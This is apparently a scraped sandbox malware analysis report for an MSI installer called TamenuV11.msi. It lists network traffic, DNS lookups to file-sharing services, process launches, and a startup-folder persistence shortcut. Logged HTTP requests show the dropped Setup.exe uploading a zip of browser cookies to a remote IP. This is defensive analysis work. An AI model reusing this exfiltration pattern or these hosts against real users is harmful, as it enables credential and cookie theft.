Jul 28, 2024 14:18:53.338799953 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.338840961 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.338869095 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.338923931 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.339421988 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.339916945 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.340962887 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.341877937 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.380542994 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:18:53.439601898 CEST	443	55236	162.159.61.3	192.168.2.4
Jul 28, 2024 14:18:53.474340916 CEST	55236	443	192.168.2.4	162.159.61.3
Jul 28, 2024 14:19:34.192975998 CEST	57317	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:19:34.203233004 CEST	53	57317	1.1.1.1	192.168.2.4
Jul 28, 2024 14:19:35.045762062 CEST	50042	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:19:35.057822943 CEST	53	50042	1.1.1.1	192.168.2.4
Jul 28, 2024 14:19:35.770354986 CEST	52665	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:19:35.778026104 CEST	53	52665	1.1.1.1	192.168.2.4
Jul 28, 2024 14:19:36.434303999 CEST	58330	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:19:36.443737030 CEST	53	58330	1.1.1.1	192.168.2.4
Jul 28, 2024 14:19:36.957509995 CEST	57279	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:19:36.985002995 CEST	53	57279	1.1.1.1	192.168.2.4
Jul 28, 2024 14:19:38.519766092 CEST	61354	53	192.168.2.4	1.1.1.1
Jul 28, 2024 14:19:38.526894093 CEST	53	61354	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 28, 2024 14:18:46.669707060 CEST	192.168.2.4	1.1.1.1	0xb998	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:18:46.670027971 CEST	192.168.2.4	1.1.1.1	0x8050	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 28, 2024 14:18:52.625226021 CEST	192.168.2.4	1.1.1.1	0x24d0	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:18:52.625817060 CEST	192.168.2.4	1.1.1.1	0x628a	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Jul 28, 2024 14:19:34.192975998 CEST	192.168.2.4	1.1.1.1	0xef79	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:35.045762062 CEST	192.168.2.4	1.1.1.1	0x4c04	Standard query (0)	tempfile.me	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:35.770354986 CEST	192.168.2.4	1.1.1.1	0x4240	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:36.434303999 CEST	192.168.2.4	1.1.1.1	0xa7d8	Standard query (0)	file.io	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:36.957509995 CEST	192.168.2.4	1.1.1.1	0x3c4a	Standard query (0)	zerostone.discloud.app	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:38.519766092 CEST	192.168.2.4	1.1.1.1	0xa486	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 28, 2024 14:18:46.681233883 CEST	1.1.1.1	192.168.2.4	0x8050	No error (0)	chrome.cloudflare-dns.com		65	IN (0x0001)	false
Jul 28, 2024 14:18:46.681261063 CEST	1.1.1.1	192.168.2.4	0xb998	No error (0)	chrome.cloudflare-dns.com	172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:18:46.681261063 CEST	1.1.1.1	192.168.2.4	0xb998	No error (0)	chrome.cloudflare-dns.com	162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:18:52.633246899 CEST	1.1.1.1	192.168.2.4	0x24d0	No error (0)	chrome.cloudflare-dns.com	162.159.61.3	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:18:52.633246899 CEST	1.1.1.1	192.168.2.4	0x24d0	No error (0)	chrome.cloudflare-dns.com	172.64.41.3	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:18:52.633292913 CEST	1.1.1.1	192.168.2.4	0x628a	No error (0)	chrome.cloudflare-dns.com		65	IN (0x0001)	false
Jul 28, 2024 14:19:34.203233004 CEST	1.1.1.1	192.168.2.4	0xef79	No error (0)	oshi.at	5.253.86.15	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:34.203233004 CEST	1.1.1.1	192.168.2.4	0xef79	No error (0)	oshi.at	194.15.112.248	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:34.203233004 CEST	1.1.1.1	192.168.2.4	0xef79	No error (0)	oshi.at	188.241.120.6	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:35.057822943 CEST	1.1.1.1	192.168.2.4	0x4c04	No error (0)	tempfile.me	193.37.215.73	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:35.057822943 CEST	1.1.1.1	192.168.2.4	0x4c04	No error (0)	tempfile.me	212.111.80.158	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:35.778026104 CEST	1.1.1.1	192.168.2.4	0x4240	No error (0)	api.gofile.io	51.91.7.6	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:35.778026104 CEST	1.1.1.1	192.168.2.4	0x4240	No error (0)	api.gofile.io	45.112.123.126	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:36.443737030 CEST	1.1.1.1	192.168.2.4	0xa7d8	No error (0)	file.io	45.55.107.24	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:36.985002995 CEST	1.1.1.1	192.168.2.4	0x3c4a	No error (0)	zerostone.discloud.app	104.26.0.18	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:36.985002995 CEST	1.1.1.1	192.168.2.4	0x3c4a	No error (0)	zerostone.discloud.app	104.26.1.18	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:36.985002995 CEST	1.1.1.1	192.168.2.4	0x3c4a	No error (0)	zerostone.discloud.app	172.67.69.183	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:38.526894093 CEST	1.1.1.1	192.168.2.4	0xa486	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:38.526894093 CEST	1.1.1.1	192.168.2.4	0xa486	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:38.526894093 CEST	1.1.1.1	192.168.2.4	0xa486	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:38.526894093 CEST	1.1.1.1	192.168.2.4	0xa486	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Jul 28, 2024 14:19:38.526894093 CEST	1.1.1.1	192.168.2.4	0xa486	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

92.246.138.20

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49744	92.246.138.20	80	3992	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 28, 2024 14:19:33.594428062 CEST	483	OUT	POST /storage HTTP/1.1 Accept: application/json, text/plain, / Content-Type: multipart/form-data; boundary=--------------------------811102546146319774698210 User-Agent: axios/1.7.2 Content-Length: 2829 Accept-Encoding: gzip, compress, deflate, br Host: 92.246.138.20 Connection: close Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 31 31 31 30 32 35 34 36 31 34 36 33 31 39 37 37 34 36 39 38 32 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 36 61 30 61 63 34 39 64 2d 30 34 38 30 2d 36 65 34 33 2d 39 39 36 36 2d 64 37 61 61 32 37 61 62 37 65 37 39 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a Data Ascii: ----------------------------811102546146319774698210Content-Disposition: form-data; name="file"; filename="6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip"Content-Type: application/zip
Jul 28, 2024 14:19:33.594496965 CEST	2644	OUT	Data Raw: 50 4b 03 04 14 00 00 08 00 00 50 42 fc 58 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 42 72 6f 77 73 65 72 20 45 78 74 65 6e 73 69 6f 6e 73 5c 50 4b 03 04 14 00 00 08 00 00 65 42 fc 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 43 6f 6f Data Ascii: PKPBXBrowser Extensions\PKeBXCookies\PKeBXq-Cookies\Google_Default.txtH9*2!Y\|'6Z}Z3bX \u9x[u1DWge`xx63
Jul 28, 2024 14:19:34.160151958 CEST	200	IN	HTTP/1.1 200 OK X-Powered-By: Express Content-Type: text/html; charset=utf-8 Content-Length: 2 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Date: Sun, 28 Jul 2024 12:19:34 GMT Connection: close Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49751	92.246.138.20	80	2076	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

Timestamp	Bytes transferred	Direction	Data
Jul 28, 2024 14:19:37.738158941 CEST	483	OUT	POST /storage HTTP/1.1 Accept: application/json, text/plain, / Content-Type: multipart/form-data; boundary=--------------------------895490505522290559280028 User-Agent: axios/1.7.2 Content-Length: 2829 Accept-Encoding: gzip, compress, deflate, br Host: 92.246.138.20 Connection: close Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 39 35 34 39 30 35 30 35 35 32 32 32 39 30 35 35 39 32 38 30 30 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 63 39 65 63 63 30 36 64 2d 64 30 31 66 2d 37 66 37 36 2d 64 39 66 38 2d 65 66 33 63 61 36 64 62 30 64 66 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a Data Ascii: ----------------------------895490505522290559280028Content-Disposition: form-data; name="file"; filename="c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip"Content-Type: application/zip
Jul 28, 2024 14:19:37.738383055 CEST	2644	OUT	Data Raw: 50 4b 03 04 14 00 00 08 00 00 57 42 fc 58 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 42 72 6f 77 73 65 72 20 45 78 74 65 6e 73 69 6f 6e 73 5c 50 4b 03 04 14 00 00 08 00 00 68 42 fc 58 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 43 6f 6f Data Ascii: PKWBXBrowser Extensions\PKhBXCookies\PKhBXq-Cookies\Google_Default.txtH9*2!Y\|'6Z}Z3bX \u9x[u1DWge`xx63
Jul 28, 2024 14:19:38.370914936 CEST	200	IN	HTTP/1.1 200 OK X-Powered-By: Express Content-Type: text/html; charset=utf-8 Content-Length: 2 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Date: Sun, 28 Jul 2024 12:19:38 GMT Connection: close Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	08:18:10
Start date:	28/07/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TamenuV11.msi"
Imagebase:	0x7ff72cd10000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	08:18:28
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\Setup\Setup.exe"
Imagebase:	0x7ff624f50000
File size:	172'671'488 bytes
MD5 hash:	2B413D49C423BB99F05F8379154732CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 1%, Virustotal, Browse
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	08:18:32
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Imagebase:	0x7ff624f50000
File size:	172'671'488 bytes
MD5 hash:	2B413D49C423BB99F05F8379154732CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	08:18:31
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk" /T:C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Imagebase:	0x400000
File size:	57'344 bytes
MD5 hash:	59375510BDE2FF0DBA7A8197AD9F12BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	12
Start time:	08:18:33
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	26
Start time:	08:18:35
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	08:18:36
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	08:18:37
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Imagebase:	0x7ff624f50000
File size:	172'671'488 bytes
MD5 hash:	2B413D49C423BB99F05F8379154732CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	08:18:38
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	39
Start time:	08:18:39
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	42
Start time:	08:18:40
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	45
Start time:	08:18:41
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\Setup\Setup.exe"
Imagebase:	0x7ff624f50000
File size:	172'671'488 bytes
MD5 hash:	2B413D49C423BB99F05F8379154732CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	49
Start time:	08:18:42
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	50
Start time:	08:18:43
Start date:	28/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	51
Start time:	08:18:44
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Imagebase:	0x7ff624f50000
File size:	172'671'488 bytes
MD5 hash:	2B413D49C423BB99F05F8379154732CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	56
Start time:	08:18:46
Start date:	28/07/2024
Path:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Imagebase:	0x7ff624f50000
File size:	172'671'488 bytes
MD5 hash:	2B413D49C423BB99F05F8379154732CE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	57
Start time:	08:18:45
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	72
Start time:	08:18:49
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	78
Start time:	08:18:50
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	84
Start time:	08:18:52
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	90
Start time:	08:18:53
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TamenuV11.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\48ea53.rbs

C:\Users\user\AppData\Local\Programs\Setup\LICENSE.electron.txt

C:\Users\user\AppData\Local\Programs\Setup\LICENSES.chromium.html

C:\Users\user\AppData\Local\Programs\Setup\Setup.exe

C:\Users\user\AppData\Local\Programs\Setup\chrome_100_percent.pak

C:\Users\user\AppData\Local\Programs\Setup\chrome_200_percent.pak

C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll

C:\Users\user\AppData\Local\Programs\Setup\ffmpeg.dll

C:\Users\user\AppData\Local\Programs\Setup\icudtl.dat

C:\Users\user\AppData\Local\Programs\Setup\libEGL.dll

C:\Users\user\AppData\Local\Programs\Setup\libGLESv2.dll

C:\Users\user\AppData\Local\Programs\Setup\locales\af.pak

C:\Users\user\AppData\Local\Programs\Setup\locales\am.pak

C:\Users\user\AppData\Local\Programs\Setup\locales\ar.pak

C:\Users\user\AppData\Local\Programs\Setup\locales\bg.pak

C:\Users\user\AppData\Local\Programs\Setup\locales\bn.pak

C:\Users\user\AppData\Local\Programs\Setup\locales\ca.pak

Windows Analysis Report
TamenuV11.msi

Target ID:	96
Start time:	08:18:55
Start date:	28/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Imagebase:	0x7ff6c8b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	125
Start time:	08:18:57
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	142
Start time:	08:18:58
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	152
Start time:	08:18:59
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	166
Start time:	08:19:00
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	174
Start time:	08:19:01
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	182
Start time:	08:19:02
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	197
Start time:	08:19:03
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	207
Start time:	08:19:04
Start date:	28/07/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
